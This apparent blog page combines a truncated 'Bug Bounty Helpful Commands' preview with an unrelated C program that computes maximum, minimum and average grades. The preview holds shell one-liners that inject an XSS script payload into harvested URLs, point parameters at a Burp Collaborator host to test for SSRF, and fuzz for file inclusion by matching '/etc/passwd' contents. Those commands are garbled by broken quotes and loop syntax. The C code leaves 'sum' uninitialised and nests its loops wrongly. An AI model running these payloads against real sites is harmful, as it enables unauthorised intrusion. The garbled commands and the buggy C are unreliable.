Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

How to Find Maximum Grade, Minimum Grade and average using Array in C

 

#include <stdio.h>

int main(){

     

      int i,max,min,aveg,sum;

    int  marks[22]={64,36,56,47,40,54,61,60,58,64,54,48,59,45,63,54,50,49,51,60,58,59};

for ( i=0; i<22; i++)

{

     max=marks[0]; 

for( i=0; i<22; i++)

{

      if(max < marks[i])

      max=marks[i];

   }


min=marks[0];

for( i=0; i<22; i++)

  {

    if(min>marks[i])

    min=marks[i];

}

  for (i=0; i<22; i++) 

      {

         sum += marks[i];

   }

      aveg = sum / 22;

printf("The maximum Grade is : %d \n", max);

printf("The minimum Grade is : %d \n", min);

printf("The Average of the given Grades is : %d \n", aveg);

}    

return 0;

}


Comments

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C